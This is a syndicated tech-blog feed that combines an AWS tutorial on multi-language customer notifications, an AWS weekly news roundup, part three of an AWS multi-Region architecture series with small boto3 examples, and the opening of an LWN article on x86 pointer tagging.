6. After the message is successfully validated, it is translated into various languages depending on the customers’ profiles. The Translate Lambda function determines the number of unique languages by referring to the customer profile data in the Amazon DynamoDB table. The function then uses Amazon Translate to translate the message into the different languages required for that notification event (a minimal sketch of the Translate call follows the examples below). In our example use case, the converted messages look as follows:

  • German (de):

Das Unternehmen fügt dem Menü einen neuen Punkt hinzu, der bis zum 10. Mai live geschaltet wird. Bitte stellen Sie sicher, dass Sie auf diese Änderung vorbereitet sind und planen Sie entsprechend.

  • French (fr):

La société ajoute un nouvel article au menu, qui sera mis en ligne d’ici le 10 mai. Assurez-vous d’être prêt pour ce changement et de planifier en conséquence.
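A minimal sketch of the Translate call, assuming boto3 (in the deployed solution the target language codes come from the customer profiles in DynamoDB; they are hard-coded here for illustration):

import boto3

translate = boto3.client("translate")

def translate_notification(message: str, target_languages: list[str]) -> dict[str, str]:
    """Translate an English notification into each unique target language."""
    translations = {}
    for lang in target_languages:
        result = translate.translate_text(
            Text=message,
            SourceLanguageCode="en",
            TargetLanguageCode=lang,
        )
        translations[lang] = result["TranslatedText"]
    return translations

# For the example notification, this returns the German and French texts shown above.
messages = translate_notification("The company is adding a new item to the menu...", ["de", "fr"])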

7. The last step in the workflow is to build the notification logic and deliver the notifications. The Amazon Pinpoint Lambda function retrieves the customer’s profile from the Amazon DynamoDB table. It then parses each record for a given notification event to find out the delivery mode (email, voice, or SMS message). The function then builds the notification logic using Amazon Pinpoint, which notifies each customer by email, voice, or SMS, as sketched below.
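For the SMS channel, the delivery call might look like this minimal sketch (the Pinpoint project ID and phone number are placeholders; email and voice use the same send_messages API with different channel types and message configurations):

import boto3

pinpoint = boto3.client("pinpoint")

def send_sms(application_id: str, phone_number: str, body: str) -> None:
    """Send one translated notification over the SMS channel."""
    pinpoint.send_messages(
        ApplicationId=application_id,  # your Pinpoint project ID
        MessageRequest={
            "Addresses": {phone_number: {"ChannelType": "SMS"}},
            "MessageConfiguration": {
                "SMSMessage": {"Body": body, "MessageType": "TRANSACTIONAL"}
            },
        },
    )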

Code repository

The code for this solution is available on GitHub. Review the README file for detailed instructions on how to download and run the solution in your AWS account.

Conclusion

Organizations that operate on an international basis often struggle to build a multi-language notification system to communicate any business-related announcements or notifications to their customers in different languages. Communicating these announcements or notifications in a variety of formats such as email, voice, and SMS can be time-consuming. Our solution addresses these challenges using AWS services with fewer steps than traditional third-party options. This solution also features automatic scaling, built-in high availability, and a pay-for-use billing model to increase agility and optimize costs. These technologies not only decrease infrastructure management tasks like capacity provisioning and patching, but also provide for a better customer experience.

AWS Week in Review – March 28, 2022

Post Syndicated from Marcia Villalba original https://aws.amazon.com/blogs/aws/aws-week-in-review-march-28-2022/

This post is part of our Week in Review series. Check back each week for a quick round up of interesting news and announcements from AWS!

Welcome to another round-up of the most significant AWS launches from the previous week. Among the most relevant news, we have improvements to AWS Lambda, a new service for game developers, and the return of the AWS Summits all around the world.

Last Week’s Launches
Here are some launches that got my attention during the previous week.

AWS Lambda Now Supports Up to 10 GB Ephemeral Storage – This new launch allows you to configure the temporary file system capacity (/tmp) of Lambda up to 10 GB! This is very useful for customers that are trying to use Lambda for ETL jobs, ML inference, or other data-intensive workloads. Check Channy’s launch blog post to learn more about how to get started.
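For example, an existing function can be opted into the larger /tmp with a single configuration call. A quick sketch, assuming boto3 (the function name is a placeholder; sizes are specified in MB):

import boto3

lambda_client = boto3.client("lambda")

# Raise the function's ephemeral /tmp storage to the new 10 GB maximum.
lambda_client.update_function_configuration(
    FunctionName="etl-job",            # hypothetical function name
    EphemeralStorage={"Size": 10240},  # MB; valid values range from 512 to 10240
)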

Amazon GameSparks – Last week we announced the launch of Amazon GameSparks in preview. Amazon GameSparks is a new serverless service that makes it easy for developers to create, test, and tune custom game features without thinking about the underlying servers or infrastructure. It comes with out-of-the-box features ideal for game backends and it is pre-integrated with the Unity game engine. Learn more in Tabitha’s blog post.

Amazon Connect Forecasting, Capacity Planning, and Scheduling – This set of ML-powered capabilities makes it easier for contact center managers to predict customer service workloads, determine ideal staffing levels, and schedule agents accordingly. These features are available in preview and you can learn more in Sajith’s blog post.

AWS Proton Support for Terraform Open Source – Last November we announced the preview of this feature, and now it is generally available in all the AWS Regions where Proton is available. Platform teams can now define Proton templates using Terraform modules. Read the What’s New post for more information.

Amazon Polly Now Offers Neural TTS Voices in Catalan and Mexican Spanish – Polly is a service that turns your text into lifelike speech. It has support for Neural TTS voices in many languages, and last week two more were added: Mexican Spanish and Catalan. You can read more in the What’s New post and listen to the Mexican Spanish voice in this audio.


For a full list of AWS announcements, be sure to keep an eye on the What’s New at AWS page.

Other AWS News

Podcast Charlas Técnicas de AWS – If you understand Spanish, this podcast is for you. Podcast Charlas Técnicas is one of the official AWS podcasts in Spanish. It has episodes every other week. The podcast is meant for builders, and it shares stories on how customers implemented and learned AWS and how to architect applications using AWS services. You can listen to all the episodes directly from your favorite podcast app or the podcast web page.

AWS Open Source News and Updates – Ricardo Sueiras, my colleague from the AWS Developer Relations team, runs this newsletter. It brings you all the latest open-source projects, posts, and more. This week he shares the latest open-source projects and tools, plus AWS and community blog posts related to open source. Read edition #106 here.

Upcoming AWS Events
Check your calendars and sign up for these AWS events:

Building a Tech-Enabled Biotech with Celsius Therapeutics on Tuesday March 29 at 10 PM UTC – My colleague Mark Birch hosts regular Clubhouse events, in which he talks with different startups. These companies share their journey and experience using AWS. Join the live event here.

The AWS Summits Are Back – Don’t forget to register for the AWS Summits in Brussels (on March 31), Paris (on April 12), San Francisco (on April 20-21), and London (on April 27). More summits are coming in the next weeks, and we’ll let you know in these weekly posts.

That’s all for this week. Check back next Monday for another Week in Review!

— Marcia

Creating a Multi-Region Application with AWS Services – Part 3, Application Management and Monitoring

Post Syndicated from Joe Chapman original https://aws.amazon.com/blogs/architecture/creating-a-multi-region-application-with-aws-services-part-3-application-management-and-monitoring/

In Part 1 of this series, we built a foundation for your multi-Region application using AWS compute, networking, and security services. In Part 2, we integrated AWS data and replication services to move and sync data between AWS Regions.

In Part 3, we cover AWS services and features used for messaging, deployment, monitoring, and management.

Developer tools

Automation that uses infrastructure as code (IaC) removes manual steps to create and configure infrastructure. It offers a repeatable template that can deploy consistent environments in different Regions.

IaC with AWS CloudFormation StackSets uses a single template to create, update, and delete stacks across multiple accounts and Regions in a single operation. When writing an AWS CloudFormation template, you can change the deployment behavior by pairing parameters with conditional logic. For example, you can set a “standby” parameter that, when “true,” limits the number of Amazon Elastic Compute Cloud (Amazon EC2) instances in an Amazon EC2 Auto Scaling group deployed to a standby Region.

Applications with deployments that span multiple Regions can use cross-Region actions in AWS CodePipeline for a consistent release pipeline. This way you won’t need to set up different actions in each Region. EC2 Image Builder and Amazon Elastic Container Registry (Amazon ECR) have cross-Region copy features to help with consistent AMI and image deployments, as covered in Part 1.

Event-driven architecture

Decoupled, event-driven applications produce a more extensible and maintainable architecture by having each component perform its specific task independently.

Amazon EventBridge, a serverless event bus, can send events between AWS resources. By utilizing cross-Region event routing, you can share events between workloads in different Regions (Figure 1) and accounts. For example, you can share health and utilization events across Regions to determine which Regional workload deployment is best suited for requests.

Figure 1. EventBridge routing events from one Region to event buses in other Regions
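As a rough sketch of how such routing is wired up with boto3 (the rule name, event pattern, account ID, and delivery role ARN below are all placeholders):

import boto3

events = boto3.client("events", region_name="us-east-1")

# Forward matching events from the default bus in us-east-1 to a bus in eu-west-1.
events.put_rule(
    Name="share-health-events",
    EventPattern='{"source": ["custom.workload"], "detail-type": ["HealthSignal"]}',
)
events.put_targets(
    Rule="share-health-events",
    Targets=[{
        "Id": "eu-west-1-bus",
        "Arn": "arn:aws:events:eu-west-1:123456789012:event-bus/default",
        "RoleArn": "arn:aws:iam::123456789012:role/EventBridgeCrossRegionRole",  # needs events:PutEvents on the target bus
    }],
)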

If your event-driven application relies on pub/sub messaging, Amazon Simple Notification Service (Amazon SNS) can fan out to multiple destinations. When the destination targets are Amazon Simple Queue Service (Amazon SQS) queues or AWS Lambda functions, Amazon SNS can notify recipients in different Regions. For example, you can send messages to a central SQS queue that processes orders for a multi-Region application.
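A minimal sketch of that fan-out pattern with boto3 (topic and queue ARNs are placeholders): an SQS queue in another Region subscribes to the topic, and a single publish reaches every subscriber.

import boto3

sns = boto3.client("sns", region_name="us-east-1")

# SQS queues and Lambda functions in other Regions can subscribe directly to the topic.
sns.subscribe(
    TopicArn="arn:aws:sns:us-east-1:123456789012:order-events",
    Protocol="sqs",
    Endpoint="arn:aws:sqs:eu-west-1:123456789012:central-order-queue",
)

# One publish fans out to all subscriptions, regardless of their Region.
sns.publish(
    TopicArn="arn:aws:sns:us-east-1:123456789012:order-events",
    Message='{"orderId": "42", "status": "created"}',
)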

Monitoring and observability

Observability becomes even more important as the number of resources and deployment locations increases. Being able to quickly identify the impact and root cause of an issue will influence recovery activities, and ensuring your observability stack is resilient to failures will help you make these decisions. When building on AWS, you can pair the health of AWS services with your application metrics to obtain a more complete view of the health of your infrastructure.

AWS Health dashboards and APIs show account-specific events and scheduled activities that may affect your resources. These events cover all Regions, and can expand to include all accounts in your AWS Organization. EventBridge can monitor events from AWS Health to take immediate actions based on an event. For example, if multiple services are reporting as degraded, you could set the EventBridge event target to an AWS Systems Manager automated runbook that prepares your disaster recovery (DR) application for failover.

AWS Trusted Advisor offers actionable alerts to optimize cost, increase performance, and improve security and fault tolerance. Trusted Advisor shows results across all Regions and can generate a report that shows an aggregated view of all check results across all accounts within an organization.

To maintain visibility over an application deployed across multiple Regions and accounts, you can create a Trusted Advisor dashboard and an operations dashboard with AWS Systems Manager Explorer. The operations dashboard offers a unified view of resources, such as Amazon EC2, Amazon CloudWatch, and AWS Config data. You can combine the metadata with Amazon Athena to create a multi-Region and multi-account inventory view of resources.

You can view metrics from applications and resources deployed across multiple Regions in the CloudWatch console. This makes it easy to create graphs and dashboards for multi-Region applications. Cross-account functionality is also available in CloudWatch, so you can create a centralized view of dashboards, alarms, and metrics across your organization.

Amazon OpenSearch Service aggregates unstructured and semi-structured log files, messages, metrics, documents, configuration data, and more. Cross-cluster replication replicates indices, mappings, and metadata in an active-passive setup from one OpenSearch Service domain to another. This reduces latency across Regions and ensures high availability of your data.

AWS Resilience Hub assesses and tracks the resiliency of your application. It checks how well an application will maintain availability when performing a Regional failover. For example, it can check if an application has cross-Region replication configured on Amazon Simple Storage Service (Amazon S3) buckets or that Amazon Relational Database Service (Amazon RDS) instances have a cross-Region read-replica. Figure 2 shows an output of a Resilience Hub assessment. It recommends use of Route 53 Application Recovery Controller (covered in Part 1) to ensure the Amazon EC2 Auto Scaling group in a Region is scaled and ready to accept traffic before we fail over to it.

Figure 2. Resilience Hub recommendations

Management: Governance

Growing an application into a new country means there may be additional data privacy laws and regulations to follow. These will vary depending on the country, and we encourage you to investigate with your legal team to fully understand how this affects your application.

AWS Control Tower supports data compliance by providing guardrails to control and meet data residency requirements. These guardrails are a collection of Service Control Policies (SCPs) and AWS Config rules. You can implement them independently of AWS Control Tower if needed. Additional security-centric multi-Region services are covered in part 1.

AWS Config provides a detailed view of the configuration and history of AWS resources. An AWS Config aggregator collects configuration and compliance data from multiple accounts and Regions into a central account. This centralized view offers a comprehensive view of the compliance and actions on resources, regardless of which account or Region they reside in.

Management: Operations

Several AWS Systems Manager capabilities allow for easier administration of AWS resources, especially as applications grow. Systems Manager Automation simplifies common maintenance and deployment tasks for AWS resources with automated runbooks. These runbooks automate actions on resources across Regions and accounts. You can pair Systems Manager Automation with Systems Manager Patch Manager to ensure instances maintain the latest patches across accounts and Regions. Figure 3 shows Systems Manager running several automation documents on a multi-Region architecture.

Figure 3. Using Systems Manager automation from a central operations AWS account to automate actions across multiple Regions

Bringing it together

At the end of each part of this blog series, we build on a sample application based on the services covered. This shows you how to bring these services together to build a multi-Region application with AWS services. We don’t use every service mentioned, just those that fit the use case.

We built this example to expand to a global audience. It requires high availability across Regions, and favors performance over strict consistency. We have chosen the following services covered in this post to accomplish our goals, building on our foundation from part 1 and part 2:

  • CloudFormation StackSets to deploy everything with IaC. This ensures the infrastructure is deployed consistently across Regions.
  • AWS Config rules provide a centralized place to monitor, record, and evaluate the configuration of our resources.
  • For added observability, we created dashboards with the CloudWatch dashboard, the Personal Health Dashboard, and the Trusted Advisor dashboard.
Figure 4. Building an application with multi-Region services

While our primary objective is expanding to a global audience, we note that some of the services such as CloudFormation StackSets rely on Region 1. Each Regional deployment is set up for static stability, but if there were an outage in Region 1 for an extended period of time, our DR playbook would outline how to make CloudFormation changes in Region 2.

Summary

Many AWS services have features to help you build and manage a multi-Region architecture, but identifying those capabilities across 200+ services can be overwhelming.

In this 3-part blog series, we’ve explored AWS services with features to assist you in building multi-Region applications. In Part 1, we built a foundation with AWS security, networking, and compute services. In Part 2, we added in data and replication strategies. Finally, in Part 3, we examined application and management layers.

Ready to get started? We’ve chosen some AWS Solutions, AWS Blogs, and Well-Architected labs to help you!

[$] Pointer tagging for x86 systems

Post Syndicated from original https://lwn.net/Articles/888914/

Pointers are a fact of life for developers working in numerous languages. It is often convenient to be able to associate a small amount — a few bits at most — of ancillary information with a pointer. This can often be done within the pointer value itself with some careful masking and shifting. CPU manufacturers have been adding ways to support the addition of this sort of “tag” to pointers; the most recent may be AMD’s “upper address ignore” (UAI) feature, support for which was recently posted by Bharata B Rao. This feature has an uncertain future in Linux, though, as the result of a fundamental design decision.
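As a language-neutral illustration of that masking and shifting (Python integers standing in for raw pointer values; real implementations do this in C, and UAI specifically concerns the upper address bits rather than the low alignment bits used here):

TAG_BITS = 3
TAG_MASK = (1 << TAG_BITS) - 1  # 0b111: the low bits are free on 8-byte-aligned pointers

def pack(ptr: int, tag: int) -> int:
    """Stash a small tag in the unused low bits of an aligned pointer value."""
    assert ptr & TAG_MASK == 0, "pointer must be aligned"
    return ptr | (tag & TAG_MASK)

def unpack(tagged: int) -> tuple[int, int]:
    """Recover the original pointer value and the tag."""
    return tagged & ~TAG_MASK, tagged & TAG_MASK

packed = pack(0x7F3A9C40, 0b101)
assert unpack(packed) == (0x7F3A9C40, 0b101)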
